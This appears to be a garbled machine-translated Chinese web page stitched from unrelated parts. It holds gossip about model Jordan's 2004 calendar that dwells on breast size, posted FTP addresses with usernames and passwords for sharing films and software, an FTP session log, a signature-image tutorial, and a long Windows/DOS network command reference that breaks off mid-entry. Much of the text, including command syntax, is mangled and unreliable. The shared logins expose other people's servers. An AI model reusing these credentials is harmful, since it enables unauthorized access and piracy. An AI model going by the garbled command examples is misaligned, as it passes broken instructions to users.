Logo

www.cloudinto.com


2004 December - - superior studio - extraordinary contribution to the

Big wonderful calendar 2004 Jordan.


http://www. . Jmnews. . Com. . Cn 2004-12-23 11:25 Qianlong. .













In 2004, for the third edition of the girls Jordan is a harvest year. A few days before her boyfriend Anderson official marriage to Jordan, it was informed that two of my friends wedding for next year, and has always been jealous of spice Jordan specially requested that the mass wedding ceremony in the Castle and luxury cannot be less than a couple of those specifications Beckham.


Jordan's love had become available, the cause is plain sailing, shooting with her boyfriend earlier TV jungle show made a sensational effect, Jordan played all the way soared. A while ago we introduced Jordan sexy calendar 2005, and now, we participated in the filming of her 2004 calendar recommend it to everyone, of course, the biggest selling point is still 32FF of the breast. (BERLIN). .


> > Nine big breasts <。.>


NO. UK Page Three girl Jordan .1. .


.2 Australian racing NO. Queen Sarah-Jane.


NO. .3 Serie Boobs Ferry Li. .


.4 serie Rome NO. baby fairy Lily.


NO. .5 Sun Christmas baby. .


F1 racing NO. .6 hot Girl.


NO. .7 Lazio sexy godmother Falci. .


.8 Marathon her NO. Lionel.


NO. .9 British Page Three Girl Jodi. .


[IMG] [/IMG]。.


[IMG]. .


[/IMG]。.


[IMG]. .


[/IMG]。.


[IMG]. .


[/IMG]。.


[IMG]. .


[/IMG]。.


[IMG]. .


[/IMG]。.






Film + TV FTP. .


IP: 202。.67。.150。.231。.


USER: lusochina. . Com. .


PASS: leech。.


[R] is connected to the 202. .67. .150. .231 -> IP = 202. .67. .150. .231 PORT = 21. .


[Right] connecting to 202. .231 .150 .67... ".


[R] 220 ---- Welcome to Pure-FTPd [privsep] ----。 .


[Right] 220-You are user allowed number 15 of 50.


[R] 220-Local time is now 16:02. . Server port: 21. .


[Right] 220-This is a private system – No anonymous login.


[R] 220 You will be disconnected after 3 minutes of inactivity. .


[Right] USER lusochina. .com.


[R] 331 User lusochina. . Com OK. . Password required. .


[Right] PASS (hidden).


[R] 230-Your bandwidth usage is restricted. .


[Right] 230-User lusochina. .com has access to: 501 group.


[R] 230 OK. . Current directory is /. .


[Right] SYST.


[R] 215 UNIX Type: L8. .


[Right] FEAT.


[R] 211-Extensions supported:. .


[Right] EPRT.


[R] IDLE. .


[Right] MDTM.


[R] SIZE. .


[Right] REST STREAM.


[R] MLST type *; size *; sizd *; modify *; UNIX. . Mode *; UNIX. . Uid *; UNIX. . Gid *; unique *;. .


MLSD [right].


[R] ESTP. .


[Right] PASV.


[R] EPSV. .


[Right] SPSV.


[R] ESTA. .


[Right] 211 End.


[R] CWD /. .


[Right] 250 OK. Current directory is /。.


[R] PWD. .


[Right] 257 "/" is your current location.


[R] TYPE A. .


[Right] ASCII 200 TYPE is now.


[R] PASV. .


[Right] 227 Entering Passive Mode (202, 67,150,231,172,102).


[R] is open data connection IP: 202. .67. .150. .231 Port: 44134. .


[Right] LIST-al.


[R] 150 Accepted data connection. .


[Right] 226-Options:-a-l.


[R] 226 5 matches total. .


[Right] list is complete: 299 bytes to 2. .69 SEC (0.1 KB/sec).


Moderator appointed posts of some ftp. .


ftp://218。.26。.223。.55。.


ftp://202. .109. .122. .10. .


ftp://218。.77。.119。.14。.


Anonymous login. .


Some software, and a movie.


ftp://52454:52 @ 218. .6. .174. .246 Film more. .


@ Js Member ftp://geren:geren. 221. .193 .30. .130.


liuxingyue. .


The primary member.


ftp://61. .139. .93. .68:1683. .


ftp://www。.eastgame。.net:thankyou4share@61。.177。.64。.171:8210。.


Let your signature was IP and the operating system! . .


In fact, very simple, just add a picture. Is this one: http://www. .danasoft. .com/vipersig. .jpg.


First of all, on this site http://www. . Danasoft. . Com /; for your personal private pictures, if you can not apply for use. .


Start an application.


Click the middle of custom signatures. .


Your email address: your Email (without authentication), but if you want to change the contents of the picture, it's a good idea to fill in your real Email.


Name your sign: your username is the name of your application for that picture, do not support the Chinese user name. .


Sign Language is not changed, still does not support Chinese, but believe that soon there.


Check those you want to include options you want to display the logo in the picture, several patterns are randomly displayed, you do not like to remove the hook on the line. .


There are several lines of Random Text, is displayed, insert the picture you want to display text, currently only supports English, not necessarily all fill.


Click the button below to submit, OK, buttoned up. .


Congratulations, you now have your own personalize signature!。.


The IMG tag for your new signature is:. .


http://www。.danasoft。.com/sig/XXX。.jpg。.


If you provided an email address an edit link has been sent to you to manage your signature. .


Remember that the address of the picture, then the index template in the right place to join.


If you do not want this to apply to join the default. .


Fix, HA HA!.


At the same time your mail will receive a link, is used to change the image content. .


Common command: DOS.


deltree dir out the file name to delete the directory tree cd cls clear screen to change the current directory. .


Copy copies the file copies disks diskcopy del to delete the file format to format the disk.


edit text editor mem view memory status of the establishment of a subdirectory md move moving files, change the directory name. .


More split-screen display type to display the contents of the file to remove a directory sys making rd DOS system disk.


ren to change the file name xcopy copy files and directories chkdsk check disk attrib set file attributes. .


Fdisk partition your hard drive to display date and modification date label sets the volume label defrag disk defragmentation.


msd system detects path set search directory share file sharing memmaker memory optimization management. .


Help help restore to restore the backup file set set the environment variable time displayed and modified.


tree column tree debug debugger doskey random re-call DOS command prompt prempt set to restore deleted files undelete scandisk test, repair the disk. .


Less common DOS commands.


diskcomp more append disk set of non-implementation of the file path. .


Expand restore DOS file fasthelp quickly display the help information.


fc file comparison interink start the server. .


Setver version intersvr is set to start the client.


subst paths with qbasic Basic integration environment. .


Vsafe antivirus unformat recover formatted disk.


ver display version number of DOS disk accelerator smartdrv set. .


Vol displays the disk volume label lh program loaded into upper memory.


ctty change control equipment emm386 extended memory management. .


The specific introduction: common commands.


1, Dir. .


Displays a list of files and subdirectories in the directory, Oh, this is, of course, everyone wants to know.


You can use wildcards (? And *),? Table wildcard character, * the table through with any character. .


*. Suffix.


To view the documents specified suffix. The above fact can be. ". Suffix," such as dir *. . Exe is equal to dir. . Exe. .


/p 。.


Each displays a list screen. To view the next screen, press any key on the keyboard. .


/w 。.


To wide-format list, displayed in each line up to 5 file names or directory names. .


/s 。.


Listed in the specified directory and all subdirectories for each appears in the specified file name. Environment than win the search much faster. .


Dir *. *-a .txt >. file list to write a. .txt.


dir *. .* / S -> a. . Txt file list of the current directory to write a. . Txt, including the subdirectory file. .


Second, the Attrib.


Display, set or remove assigned to the file or directory read-only, archive, system and hidden attributes. If the circumstances under which no parameters are attrib will show all the files in the current directory attributes. .


+r 。.


Set read-only attribute. .


-r 。.


Clear read-only attribute. .


+a 。.


Archive file attributes set. .


-a 。.


Clear the archive attribute. .


+s 。.


Set the system properties. .


-s 。.


Clear the system properties. .


+h 。.


Set the hidden attribute. .


-h 。.


Clear the hidden attribute. .


Third, the Cls.


Clear display window at the command prompt all of the information, and returns an empty window, that is "clear screen." .


4. Exit.


Exit the current command interpreter and return to the system. .


5. format.


Format. .


/q 。.


Perform a quick format. Remove the previous volumes formatted file table and root directory, but not between sectors scan damage area. Use the / q command-line option should only be formatted before the well-formatted volumes. .


VI. Ipconfig.


Show all current TCP / IP network configuration values, refresh the Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings. Use ipconfig without parameters to display all the adapter IP address, subnet mask, default gateway. .


/all 。.


Show all adapters complete TCP / IP configuration information. .


Ipconfig equivalent to the winipcfg, the latter in ME, 98 and 95. Although Windows XP is not the same as the winipcfg command provides a graphical interface, but you can use the "network connections" to view and update your IP address. To do this, open network connections, right-click a network connection, click the "status", and then click the "support" tab.


This command is configured to automatically obtain the most suitable for the computer IP address. It enables users to determine which TCP / IP configuration values from DHCP, automatic private IP address (APIPA) and other configuration configuration. .


Seven, md.


Create a directory or subdirectory. .


8. Move.


One or more files from one directory to the specified directory. .


9, Nbtstat.


In the local computer and remote computers based on TCP / IP (NetBT) NetBIOS protocol statistics, NetBIOS name tables and NetBIOS name cache. Nbtstat NetBIOS name cache and refresh the Windows Internet Name Service Registration (WINS) name. With no parameters using the nbtstat displays help. Nbtstat command line parameters are case-sensitive. .


-a remotename 。.


Display the remote computer's NetBIOS name table, which, RemoteName the remote computer's NetBIOS computer name. .


-A IPAddress 。.


Display the remote computer's NetBIOS name of the table, its name from the remote computer's IP address specified (in decimal separator). .


10. Netstat.


TCP connection showed activity, the computer listening port, Ethernet statistics, IP routing table, IPv4 statistics (for IP, ICMP, TCP and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, IPv6, TCP through and through the IPv6-UDP protocol). If used without parameters, netstat displays active TCP connections. .


-a 。.


Show all activities of the TCP connection and the computer's TCP and UDP port listener. .


11. Ping.


By sending "Internet Control Message Protocol (ICMP)" echo request message to verify with another TCP / IP computer's IP-level connectivity. Echo response message from the process of reception and the number will be displayed. Ping is used to detect network connectivity, reachability, and name resolution of the difficult problems of the main TCP / IP command. If no parameters, ping displays help. Name and Ip address resolution is the most simple applications it is most used. .


-t 。.


Specifies the interrupt can continue to send a response before the ping request message to the destination. To interrupt and display statistics, press CTRL-BREAK. To interrupt and quit ping, press CTRL-C. .


-lSize 。.


Specified response request message to send "data" field of the length (in bytes). The default is 32. The maximum size is 65,527. .


12. Rename (Ren).


Change the file name. .


For example, .abc ren *. *. .cba.


13, Set. .


Displays, sets, or removes environment variables. If you do not have any parameters, set command displays the current environment settings.


14, Shutdown. .


Allows you to shutdown or restart the local or remote computer. If you do not use parameters, shutdown will log off the current user.


-M ComputerName. .


Specifies that you want to turn off the computer.


-T xx. .


Will be used for the system to shut down the timer set to xx seconds. The default value is 20 seconds.


-L. .


Log off the current user, this is the default setting. -ComputerName m..


-S. .


Shut down the local computer.


-R. .


Turn off after the restart.


-A. .


To abort the shutdown. In addition to the-l and ComputerName, the system ignores the other parameters. During the timeout period, you can use-a.


15, System File Checker (sfc). .


Win if you restart the computer after the scan and verify that all protected system files.


/ Scannow. .


Immediate scans all protected system files.


/ Scanonce. .


Last scan all protected system files.


/ Purgecache. .


Immediately clear the "Windows file protection file cache", and scans all protected system files.


/ Cachesize = x. .


Set the "Windows file protection" file cache size, in megabytes.


16, type. .


Displays the contents of a text file. Use the type command to view a text file or a bat file without modifying the file.


17, Tree. .


The image displays a path or drive disk directory structure.


18, Xcopy. .


Copy files and directories, including subdirectories.


/ S. .


Copies non-blank directory and subdirectories. If you omit the xcopy/s, will work in a directory.


/ E. .


Copies all subdirectories, including an empty directory.


19, copy. .


Add one or more files from one location to another location.


20, del. .


Deletes the specified file.


bat batch ftp and telnet commands and the net and sub-command as many here do not say, but these are common to the. .


Network: common commands.


1. . The most basic, the most commonly used to test the physical network. .


Ping .168.192.. .88-.10, t-t parameter is waiting for user to interrupt the test.


2. . See DNS, IP, Mac, etc.. .


A。.Win98:winipcfg 。.


B. . Win2000 or above: Ipconfig / all. .


.NSLOOKUP C.: DNS as viewing Hebei.


C: \> nslookup. .


Default Server: ns。.hesjptt。.net。.cn 。.


Address: 202. .99. .160. .68. .


> Server .99.202. .2 .41. changed the DNS 41. .2.


> Pop. . Pcpop. . Com. .


Server: ns。.hesjptt。.net。.cn 。.


Address: 202. .99. .160. .68. .


Non-authoritative answer: 。.


Name: pop. . Pcpop. . Com. .


Address: 202。.99。.160。.212 。.


3. . Web Messenger. .


Net send computer name/IP | * (broadcasting) to deliver content, careful not to cross-segment.


net stop messenger stop messenger service can also be in the panel - Service changes. .


Net start messenger to start the Messenger service.


4. . Probing each other the other computer name, the host of the group, domain, and the current user name. .


Ping-a IP-t to display only the NetBios name.


nbtstat-a 192. .168. .10. .146 Relatively sound. .


5. .netstat-a display of your computer is currently opening up all ports.


netstat-s-e a more detailed display of your network information, including TCP, UDP, ICMP and IP statistics and so on. .


6. detect arp binding (dynamic and static) list that displays all connected to my computer, display each other's IP and MAC address.


arp-a. .


7. in the proxy server.


Bundled IP and MAC address, LAN address theft IP:. .


ARP -s 192。.168。.10。.59 00-50-ff-6c-08-75 。.


Lifting of IP and MAC address of network card binding:. .


Arp-d network card IP.


8. . Hidden in the network neighborhood on your computer. .


net config server /hidden:yes 。.


net config server / hidden: no was open. .


9. several net command.


A. . Displays the current work group server list net view, with no options when using this command, it will display the current domain or network computer list. .


For example: to view the shared resources on IP, it can be.


C: \> net view 192. .168. .10. .8. .


In 192. .168. .10. .8 the shared resource.


Notes name type resource sharing purposes. .


————————————– 。.


Web Services Disk. .


The command completed successfully.


B. . See a list of user accounts on the computer net user. .


C.-view Web links net use.


For example: net use z: \ \ 192. .168. .10. .8 \ Movie will be the IP of the movie shared directory mapped to the local Z-disks. .


D.-record link net session.


For example:. .


C:\>net session 。.


Computer user name the types of customers to open free time. .


——————————————————————————- 。.


\ \ 192. .168. .10. .110 ROME Windows 2000 2195 0 00:03:12. .


\\192。.168。.10。.51 ROME Windows 2000 2195 0 00:00:39 。.


The command completed successfully. .


10. route tracking.


A. . Tracert pop. . Pcpop. . Com. .


Pop B.. .pcpop .pathping. .com in addition to displaying the routing, but also provide the analysis, calculating 325S lost packets per cent.


11. . On shared security, several commands. .


A.. view your machine's net share the shared resource.


B. . Manually delete the share. .


net share c$ /d 。.


net share d $ / d. .


net share ipc$ /d 。.


net share admin $ / d. .


Note that the spaces are after.


C. . Add a share:. .


c:\net share mymovie=e:\downloads\movie /users:1 。.


mymovie shared success. .


At the same time limit the number of users linking to one person.


12. . In the DOS line under the setting static IP. .


A.. setting a static IP.


CMD. .


netsh 。.


netsh> int. .


interface>ip 。.


interface ip> set add "Local Links" static IP address mask gateway. .


B.-view the IP settings.


interface ip> show address. .


Arp 。.


Display and modify the "Address Resolution Protocol (ARP)" in the cache item. ARP cache contains one or more tables, they are used to store the IP address and through the analysis of Ethernet or Token Ring physical addresses. Each installed on your computer Ethernet or Token Ring network adapter has its own separate table. If no parameters, the use of the arp command will display help information. .


Syntax.


arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]. .


Parameter.


-A [InetAddr] [-N IfaceAddr]. .


Show all interface's current ARP cache table. Specify the IP address you want to display the ARP cache entries, use the ARP with InetAddr parameter-a, where InetAddr represents the specified IP address. To display the ARP cache for a specified interface, use the-N parameter where IfaceAddr IfaceAddr representative assigned to the specified IP address of the interface. The-n argument is case-sensitive.


-G [InetAddr] [-N IfaceAddr]. .


With the-a.


-D InetAddr [IfaceAddr]. .


Deletes the specified IP address entries, where InetAddr represents IP address. For the specified interface, you want to delete an item in the table, use the IfaceAddr parameter where IfaceAddr representative of assigned the IP address of the interface. To delete all entries, use the asterisk (*) wildcard character instead of InetAddr.


-S InetAddr EtherAddr [IfaceAddr]. .


Add to the ARP cache can be resolved to an IP address InetAddr EtherAddr physical address of the static items. To specify the interface table to add a static ARP cache entries, use the IfaceAddr parameter where IfaceAddr representative of assigned the IP address of the interface.


/?. .


Displays help at the command prompt.


Note. .


InetAddr and IfaceAddr used the IP address in dotted decimal notation.


Physical Address EtherAddr of six bytes, the bytes with hexadecimal notation and separated by hyphens (eg ,00-AA-00-4F-2A-9C). .


By the-s parameter added items are static, they are not the ARP cache. If you terminate the TCP/IP Protocol on startup, these items will be deleted. To create a permanent static ARP cache entries, in batch files by using the appropriate arp command and pass the "Task Scheduler" at startup, run the batch file.


Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .


Paradigm.


To display all interfaces of the ARP cache table, type:. .


arp -a。.


For the assigned IP address is 10. .0. .0. .99 Interface, to display the ARP cache table, type:. .


arp -a -N 10。.0。.0。.99。.


To add the IP address of 10. .0. .0. .80 Resolves the physical address 00-AA-00-4F-2A-9C static ARP cache entries, type: arp-s 10. .0. .0. .80 00-AA-00-4F-2A-9C. .


13。.At 。.


Program at a designated time and date on the computer to run commands and procedures. at the command only "plan" service runtime. If the case in the absence of parameters to use, then at lists scheduled commands. .


Syntax.


at [\ \ ComputerName] [([ID] [/ delete] | / delete [/ yes])]. .


at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,。.] |/next:date[,。.]}] command]。.


Parameters. .


\\computername 。.


The specified remote computer. If you omit this parameter, then the plan at the local computer commands and procedures. .


ID 。.


Planned orders assigned to the specified identifier. .


/delete 。.


Cancellation of planned orders. If you omit the ID, then the computer commands all plans will be canceled. .


/yes 。.


Delete the program event, from the system all queries answered "yes." .


hours:minutes 。.


Command to run the specified time. The time in 24 hour clock (from 00:00 [midnight] to 23:59) in hours: minutes format. .


/interactive 。.


When running the command for the logged on user, allowing command and the user interact with the desktop. .


/every: 。.


Each week or month in the specified date (for example, every Thursday, or the third day of each month) to run command command. .


date 。.


Run the command specified date. You can specify a certain day or days a week (that is, type M, T, W, Th, F, S, Su) or one month in a day or days (ie, type from a number between 1 and 31) . Separate multiple date entries with a comma. If you omit the date, then at the current day of the month to use. .


/next: 。.


The next specified date (for example, next Thursday) comes running command. .


command 。.


Designated to run the Windows command, program (.. Exe or.. Com file) or batch program (.. Bat or.. Cmd files). When the command requires a path as an argument, use the absolute path, that is, starting from the drive the entire route. If the command on the remote computer, specify the server and share name of universal naming conventions (UNC) notation, rather than a remote drive letter. .


/? 。.


Displays help at the command prompt. .


Comments.


Schtasks is more powerful superset of the command line program tool at the command line tool with all the features. Command-line program for all tasks, can be used to replace schtasks at. For more information about schtasks, see the "Related Topics." .


Use at. ..


Use the at command, require that you must be a member of the local Administrators group. .


Loads the .exe. Cmd.


Before running the command, At does not automatically load Cmd. . Exe (command interpreter). If you do not run the executable file (.. Exe), then in command at the beginning of the method must be used as follows special load Cmd. . Exe:. .


cmd /c dir > c:\test。.out。.


View the program command. .


When not used with command line options, at the scheduled task will appear in a format similar to the following: in the table.


Status ID Day Time Command Line. .


OK 1 Each F 4:30 PM net send group leads status due 。.


OK 2 Each M 12:00 AM chkstor> check. . File. .


OK 3 Each F 11:59 PM backup2。.bat 。.


Include identification number (ID). .


When used in a command prompt with the identification number (ID) at command, a single task information is displayed in a format similar to the following:.


Task ID: 1. .


Status:OK。.


Schedule: Each F. .


Time of Day:4:30 PM。.


Command: net send group leads status due when the plan with the at command (especially with a command-line options of the command), the non-through type at the command line option to check the command syntax is typed correctly. If the display in the "Command Line" column in the information is incorrect, please delete the command, and then re-type it. If not correct, you can re-type the command make it less with some command line options. See the results. .


Use the at command scheduled to run as background processes. The results will not display on your computer. To redirect output to a file, use a redirection symbol (>). If you redirect output to a file, either on the command line or in a batch file, you will need to use at the redirection symbols by using the escape character (^). For example, to redirect output to a file for Output., .text type:.


at 14:45 c: \ test. . Bat ^> c: \ output. . Txt. .


Execution of the order of the current directory to the systemroot folder.


Change the system time. .


In use at schedule a command to run after that if you change the computer's system time by typing without command-line options at enables the at Scheduler with the revised system time synchronization.


Storage command. .


Scheduled commands are stored in the registry. As a result, when you restart the "program" service, you do not lose scheduled tasks.


Connected to the network drive. .


The need for access to the network of a scheduled job, please do not use a redirected drive. "Program" service may not be able to access the redirected drive, or, in the scheduled task run time if other users are logged on, the redirected drive may not appear. Therefore, for a scheduled job, use the UNC path. For example:.


at 1:00 pm my_backup \ \ server \ share. .


Please do not use the following syntax (where x:? represents user connections).


at 1:00 pm my_backup x:. .


If you plan a use drive letters at command to connect to the shared directory, you should include an at command to complete the drive when using connect disconnected from the drive. If you cannot disconnect drive, at a command prompt, the assigned drive letter is unavailable.


Example. .


To show Marketing server lists scheduled commands, type:.


at \ \ marketing. .


To understand the server identification number 3 on the Corp's command, type:.


at \ \ corp 3. .


To schedule at 8: 00 a.m. on the Corp server running on a network share, and the list will be redirected to the Maintenance server Corp. .txt file (located in the shared directory Reports), type:.


at \ \ corp 08:00 cmd / c "net share reports = d: \ marketing \ reports>> \ \ maintenance \ reports \ corp.. txt". .


For every five days after midnight the Marketing server hard drive backup to a tape drive, first create a named Archive. .cmd batch program (which contains the backup command), and then schedule the batch program to run, and type:.


at \ \ marketing 00:00 / every: 5,10,15,20,25,30 archive. .


To cancel the current server planned all command, use the following method to clear the at schedule information:.


at / delete. .


If the command to run is not an executable (. .exe) file that follows the method used before the commands to load Cmd cmd/c. .exe:.


cmd / c dir> c: \ test. . Out. .


14。.Rsh 。.


RSH services running on remote computers run commands. Windows XP and Windows 2000 does not provide RSH service. Windows 2000 Server Resource Kit to provide named Rshsvc. . Exe's RSH service. Rsh with no parameters using the display to help. .


Syntax.


rsh [Host] [-l UserName] [-n] [Command]. .


Parameter.


Host. .


Specifies the run command on the remote computer.


-L UserName. .


Specifies the remote computer using the user name. When omitted, the currently logged on user name.


-N. .


The input of rsh to be redirected to the NULL device. This prevents local computer command to display the results.


Command. .


Specifies the command to run.


/?. .


Displays help at the command prompt.


Note. .


Standard operations.


rsh command to copy standard input to the remote command, standard output of the remote copy command to its standard output, standard error remote copy command to its standard error. Rsh normally terminate when the remote command to terminate. .


Using redirection symbols.


In order to redirect the remote computer occurs, we should live quotes cited redirection symbols (for example ">>")。 If you do not use quotation marks, redirection will happen on the local computer. For example, the following command to remote file "RemoteFile" attached to a local file "LocalFile" in:. .


rsh othercomputer cat remotefile >> localfile。.


The following command will attach to a remote file remote file otherremotefile Remotefile in:. .


rsh othercomputer cat remotefile “>>” otherremotefile。.


Use of rsh. .


When using the logged-on to a domain and running Windows XP Professional-based computer, the domain's primary domain controller must be available to verify the user name or the rsh command failed.


rhosts file. .


Rhosts file typically licensed UNIX system for network access. .rhosts file lists can access the remote computer's machine name and the associated login. In a properly configured .rhosts file was. running on a remote machine or rcp, rexec, rsh command on a remote computer that you don't need to provide logon and password information.


rhosts file is a text file, the file is an entry for each act. Entries from the local computer name, local user name and purpose of all the comments about the composition of the article. Each entry separated by tabs or spaces, comments, symbols (#) Heading. For example:. .


host7 #This computer is in room 31A。.


rhosts file must be in the remote computer user home directory. The remote computer. . Rhosts file specific implementation details, please refer to the remote system's documentation. .


Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.


Example. .


You want to name admin1 on remote computer vax1 telcon command execution on, type:.


rsh vax1-l admin1 telcon. .


15。.Tftp 。.


To run the ordinary File Transfer Protocol (TFTP) service or daemon of the remote computer (especially running UNIX computer) to transfer files or run the trivial file transfer protocol from (TFTP) service or daemon of the remote computer (especially a computer running UNIX) transmission file. .


Syntax.


tftp [-i] [Host] [(get | put)] [Source] [Destination]. .


Parameter.


-I. .


Specifies binary image transfer mode (also known as octal mode). In binary image mode, the file to a byte are transmitted as a unit. Transmission of binary files use this mode. If you omit the-I, the files will be transferred in ASCII mode. This is the default transfer mode. This mode converts the end-of-line (EOL) characters to be converted to the appropriate format on the specified computer. Transmit text files use this mode. If file transfer is successful, the data transfer rate will be displayed.


Host. .


Specify a local or remote computer.


put. .


The local Destination file on your computer to transfer to the remote Source file on your computer. Because the TFTP protocol does not support user authentication, the user must be logged on to the remote computer at the same file on the remote computer must be writable.


get. .


Will the Destination on a remote computer, the file transfer to the local Source files on your computer.


Source. .


Specifies the file you want to transfer.


Destination. .


Specifies the location of the file to. If you omit the Destination, it is assumed it with the same name as the Source.


/?. .


Displays help at the command prompt.


Note. .


Use the get parameters.


If the local computer files FileTwo sent to the remote computer file FileOne, the designated put. If the remote computer file FileTwo sent to the remote computer file FileOne, is designated get. .


Windows XP or Windows 2000 does not provide a general purpose TFTP server. Windows 2000 provides a TFTP Server service for Windows XP and Windows 2000 client computers with remote boot capabilities.


Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .


Paradigm.


From the local computer files Users. . Txt sent to the remote computer vax1 the Users19. . Txt, type:. .


tftp vax1 put users。.txt users19。.txt 。.


16. . Nbtstat. .


Displays the local computer and remote computers over TCP/IP (NetBT) protocol statistics, NetBIOS NetBIOS name table and the NetBIOS name cache. Nbtstat can refresh the NetBIOS name cache, and registering Windows Internet name service (WINS) name. Used without parameters, the nbtstat displays help.


Syntax. .


nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]。.


Parameters. .


-a remotename 。.


Display the remote computer's NetBIOS name table, which, RemoteName the remote computer's NetBIOS computer name. NetBIOS name of the table is running on the computer's NetBIOS name of the application uses the list. .


-A IPAddress 。.


Display the remote computer's NetBIOS name of the table, its name from the remote computer's IP address specified (in decimal separator). .


-c 。.


Display NetBIOS name cache contents, NetBIOS name table and resolve all addresses. .


-n 。.


Display the local computer NetBIOS name table. Registered in the state that the name is registered by broadcast or WINS server's. .


-r 。.


Display NetBIOS name resolution statistics. Configured to use WINS, Windows XP computer, this parameter returns have been on the radio and WINS name resolution and registration number. .


-R 。.


Clear the contents of the NetBIOS name cache and reload from Lmhosts file with the # PRE tag projects. .


-RR 。.


Re-release and refresh the WINS registration through the local computer's NetBIOS name. .


-s 。.


Display NetBIOS client and server sessions, and try to target IP addresses into names. .


-S 。.


Display NetBIOS client and server sessions, only IP addresses listed by the remote computer. .


Interval 。.


Again shows the selected statistics, can break between each show the number of seconds specified in Interval. Press CTRL + C to stop the show statistics. If this parameter is omitted, netstat will only display the current configuration information once. .


/? 。.


Displays help at the command prompt. .


Comments.


Nbtstat command line parameters are case-sensitive. .


The following table lists the columns generated by Nbtstat. Title description.


Input the number of bytes received. .


Output the number of bytes sent.


In / Out of the connection is from computer (outgoing) or other computer to the local computer (incoming). .


Lift name table cache entries in memory before being cleared.


Local Name of local NetBIOS name associated with the connection. .


Remote Host and the remote computer name or IP address.


<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type the name of the type. Name can be a single name, it can be group name. .


Status on a remote computer that is running NetBIOS services (the "registered"), or on the same computer name has been registered for the same service (the "conflict").


State NetBIOS connection state. .


The following table lists the possible NetBIOS connection status. Status descriptions.


Connected session is established. .


The associated connection endpoint has been created and associated with an IP address.


The end points are answered within a connection is available. .


Idle the end point is already open but does not receive the connection.


Connecting to a session at the connection stage. Analysis at this stage is the selected target by name to IP address mapping. .


To accept an inbound session is currently being accepted and will be connected shortly.


Reconnect the session will attempt to reconnect (if the first connection fails). .


The outbound session is in the connecting phase. This phase is to create a TCP connection.


Inbound connection of inbound sessions. .


Is disconnected from the session is disconnected.


Has been disconnected on the local computer is disconnected, and is awaiting confirmation of the remote system. .


Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.


Example. .


To display the NetBIOS computer name, the remote computer for CORP07 NetBIOS name table, type:.


nbtstat-a CORP07. .


To display the assigned IP address is 10. .0 .0.. .99 remote computer's NetBIOS name table, type:.


nbtstat-A 10. .0. .0. .99. .


To display the NetBIOS name of the local computer, type: table.


nbtstat-n. .


To display the NetBIOS name cache on the local computer, type:.


nbtstat-c. .


To clear the NetBIOS name cache and reload the local Lmhosts file with tag # PRE project, type:.


nbtstat-R. .


A WINS server to release the NetBIOS name registration and re-registration, type:.


nbtstat-RR. .


To every 5 seconds to display the IP address of the NetBIOS session statistics, type:.


nbtstat-S 5. .


17。.Netstat 。.


TCP connection showed activity, the computer listening port, Ethernet statistics, IP routing table, IPv4 statistics (for IP, ICMP, TCP and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, IPv6, TCP through and through the IPv6-UDP protocol). If used without parameters, netstat displays active TCP connections. .


Syntax.


netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]. .


Parameter.


-A. .


Displays all active TCP connections and the computer is listening on TCP and UDP ports.


-E. .


Displays Ethernet statistics, such as the number of bytes transmitted and received, the number of packets. This parameter can be used in conjunction with-s.


-N. .


Displays active TCP connections, however, only in digital form of address and port number, do not try to determine the name.


-O. .


Displays active TCP connections and includes each connection process ID (PID). You can in Windows Task Manager's "processes" tab to find applications that are based on the PID. This parameter can be-a,-n and-p..


-P Protocol. .


Displays the Protocol specified by the agreement. In this case, the Protocol can be tcp, tcpv6, udp, or udpv6. If this parameter is used in conjunction with the-s displays per-protocol statistics, the Protocol can be tcp, udp, icmp, ip, tcpv6, ipv6, icmpv6, or udpv6.


-S. .


Display statistics by Protocol. By default, displays the TCP, UDP, ICMP and IP protocol statistics. If you install the IPv6 protocol for Windows XP, it will display the relevant IPv6 TCP, UDP, IPv6, ICMPv6, and statistical information about the IPv6 protocol. You can use the-p parameter specifies the set of protocols.


-R. .


Displays the contents of the IP routing table. The route print command is equivalent.


Interval. .


Every Interval seconds replay once selected information. Press CTRL + c to stop redisplaying statistics. If this argument is omitted, netstat will print only the selected information at a time.


/?. .


Displays help at the command prompt.


Note. .


Used in conjunction with the command parameter must start with a hyphen (-) instead of to short a slash (/) as a prefix.


Netstat provides the following statistics:. .


Proto 。.


Protocol name (TCP or UDP). .


Local Address 。.


Local computer's IP address and port number being used. If you do not specify the-n parameter, it displays the name of IP address and port corresponding to the local computer name. If the port has not been established, the port with an asterisk (*) show. .


Foreign Address 。.


Connecting the slot of the remote computer IP address and port number. If you do not specify the-n parameter, it displays the corresponding IP address and port name. If the port has not been established, the port with an asterisk (*) show. .


(state) 。.


That the state of TCP connections. Possible states are as follows:. .


CLOSE_WAIT。.


CLOSED. .


ESTABLISHED。.


FIN_WAIT_1. .


FIN_WAIT_2。.


LAST_ACK. .


LISTEN。.


SYN_RECEIVED. .


SYN_SEND。.


TIMED_WAIT. .


The TCP connection state information, see RFC 793.


Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .


Paradigm.


To display Ethernet statistics and statistics for all protocols, type the following command:. .


netstat -e -s。.


To display only TCP and UDP protocol statistics, type the following command:. .


netstat -s -p tcp udp。.


To display an event every 5 seconds, the TCP connection and the process ID, please type the following command:. .


nbtstat -o 5。.


To display activity in digital form TCP connections and the process ID, please type the following command:. .


nbtstat -n -o。.


18. . Runas. .


Allows the user to use other permissions to run the specified tool and procedure instead of the user's current logon provides.


Syntax. .


